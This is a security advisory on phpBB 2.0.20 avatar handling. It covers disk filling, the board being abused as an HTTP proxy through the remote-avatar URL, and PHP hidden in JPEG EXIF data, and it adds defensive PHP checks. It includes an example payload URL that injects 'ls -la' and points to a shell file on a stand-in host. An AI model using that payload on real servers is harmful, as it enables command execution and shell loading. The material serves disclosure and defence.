PHPBB 2.0.20 multiple issues with avatars

Several long-standing problems lie in the way it handles remote and uploaded avatars:

a remote user can:

(1) fill the server with useless files, because phpBB does not delete
the previous avatar when you upload a new one

(2) use phpBB installations to launch exploits against other servers,
because the "avatarurl" value you submit when modifying your profile is used
as the path of a GET request.

Look at usercp_avatar.php near lines 125-153:
...
    if ( $avatar_mode == 'remote' && preg_match('/^(http:\/\/)?([\w\-\.]+)\:?([0-9]*)\/(.*)$/', $avatar_filename, $url_ary) )
    {
        if ( empty($url_ary[4]) )
        {
            $error = true;
            $error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['Incomplete_URL'] : $lang['Incomplete_URL'];
            return;
        }

        // host ($url_ary[2]), port ($url_ary[3]) and path ($url_ary[4]) all come straight from the user
        $base_get = '/' . $url_ary[4];
        $port = ( !empty($url_ary[3]) ) ? $url_ary[3] : 80;

        if ( !($fsock = @fsockopen($url_ary[2], $port, $errno, $errstr)) )
        {
            $error = true;
            $error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['No_connection_URL'] : $lang['No_connection_URL'];
            return;
        }

        // the path is sent as-is, query string included
        @fputs($fsock, "GET $base_get HTTP/1.1\r\n");
        @fputs($fsock, "HOST: " . $url_ary[2] . "\r\n");
        @fputs($fsock, "Connection: close\r\n\r\n");

        unset($avatar_data);
        while( !@feof($fsock) )
        {
            $avatar_data .= @fread($fsock, $board_config['avatar_filesize']);
        }
        @fclose($fsock);
...

phpBB does not check whether the user-supplied value ends with an image extension, nor
whether the supplied string contains "&" and "?" characters. So you can submit a value
like this:

http://some_vulnerable.host/somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt

phpBB will then send a GET request like this:

GET /somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt HTTP/1.0
HOST: some_vulnerable.host
Connection: close

Obviously you get no output back, but this makes phpBB behave like an HTTP proxy

(3) inject PHP code inside JPEG files as EXIF metadata content:
this, in combination with vulnerable third-party code, can be used
to compromise the server where PHP is installed.
It should be enough to check for PHP code inside the temporary file
before copying the new avatar into the "images/avatars/" folder.
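
As a defender-side illustration of the fixes implied by items (1) to (3), here is an added example that is not phpBB's own code: it validates a remote avatar URL before any socket is opened (item 2), checks that fetched or uploaded bytes are a real image carrying no PHP tag (item 3), and deletes the previous avatar when a new one is stored (item 1). The function names, the server-generated filename scheme and the $max_bytes/$avatar_dir parameters are assumptions made for illustration; only the idea of using $board_config['avatar_filesize'] as the size limit comes from the code quoted above.

```php
<?php
// Added example, not phpBB's own code: defender-side checks for the three
// avatar problems described in this advisory. Function names and the
// directory/filename conventions are assumptions made for illustration.

/**
 * Item 2: validate a remote avatar URL before anything is fetched.
 * Returns null when acceptable, otherwise a short reason string.
 */
function validate_avatar_url(string $url): ?string
{
    $parts = parse_url($url);
    if ($parts === false || empty($parts['host']) || empty($parts['path'])) {
        return 'Incomplete URL';
    }
    if (!in_array(strtolower($parts['scheme'] ?? ''), ['http', 'https'], true)) {
        return 'Only http and https URLs are accepted';
    }
    // No "?", "#" or credentials: the request must not carry a query string
    // to some third-party script.
    if (isset($parts['query']) || isset($parts['fragment']) || isset($parts['user'])) {
        return 'Query strings, fragments and credentials are not allowed';
    }
    // The path must end with an image extension.
    if (!preg_match('/\.(gif|jpe?g|png)$/i', $parts['path'])) {
        return 'Path must end with an image extension';
    }
    // Refuse hosts that resolve into the server's own network so the board
    // cannot be used to reach loopback, RFC 1918 or link-local addresses.
    $ip = gethostbyname($parts['host']);   // returns the input unchanged on failure
    if (!filter_var($ip, FILTER_VALIDATE_IP)) {
        return 'Host does not resolve';
    }
    if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE)) {
        return 'Host resolves to a private or reserved address';
    }
    return null;
}

/**
 * Item 3: make sure the bytes are a real GIF/JPEG/PNG of acceptable size and
 * contain no PHP open tag anywhere, EXIF and comment segments included.
 * Returns the IMAGETYPE_* constant, or null if the data must be rejected.
 */
function check_avatar_data(string $data, int $max_bytes): ?int
{
    if ($data === '' || strlen($data) > $max_bytes) {
        return null;
    }
    $tmp = tempnam(sys_get_temp_dir(), 'av');
    file_put_contents($tmp, $data);
    $info = @getimagesize($tmp);   // validates the image container
    unlink($tmp);
    if ($info === false || !in_array($info[2], [IMAGETYPE_GIF, IMAGETYPE_JPEG, IMAGETYPE_PNG], true)) {
        return null;
    }
    // "<?php", "<?=" or a bare short tag followed by whitespace; "<?xpacket"
    // (XMP metadata found in legitimate JPEGs) deliberately does not match.
    if (preg_match('/<\?(php\b|=|\s)|<script\b/i', $data)) {
        return null;
    }
    return $info[2];
}

/**
 * Item 1: write the new avatar under a server-chosen name and delete the
 * previous file so abandoned avatars do not pile up.
 * Returns the new file name to store in the user's profile.
 */
function store_avatar(string $data, int $type, int $user_id, string $avatar_dir, ?string $old_name): string
{
    $dir = rtrim($avatar_dir, '/');
    $new_name = $user_id . '_' . time() . image_type_to_extension($type, true);
    if (file_put_contents($dir . '/' . $new_name, $data) === false) {
        throw new RuntimeException('Could not write avatar');
    }
    if ($old_name !== null && $old_name !== '') {
        // basename() keeps a stored name from pointing outside the avatar directory
        $old_path = $dir . '/' . basename($old_name);
        if ($old_path !== $dir . '/' . $new_name && is_file($old_path)) {
            unlink($old_path);
        }
    }
    return $new_name;
}

// Usage with constructed input (no network needed): a query string and a
// loopback host are both rejected before any socket is opened.
var_dump(validate_avatar_url('http://example.org/pic.gif?x=1'));
var_dump(validate_avatar_url('http://127.0.0.1/pic.gif'));
```

Two caveats on the design: the resolve-then-connect sequence leaves a window for a DNS answer to change between the check and fsockopen(), so the fetch should connect to the $ip returned during validation and only put the original hostname in the Host header; and getimagesize() plus a tag scan validates the container, not the consumer, so the durable fix for item 3 is to have the web server refuse to execute PHP from "images/avatars/" at all.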

rgod
---------------------------------------------------------------------------------
mail: rgod [at] autistici [dot] org
site: http://retrogod.altervista.org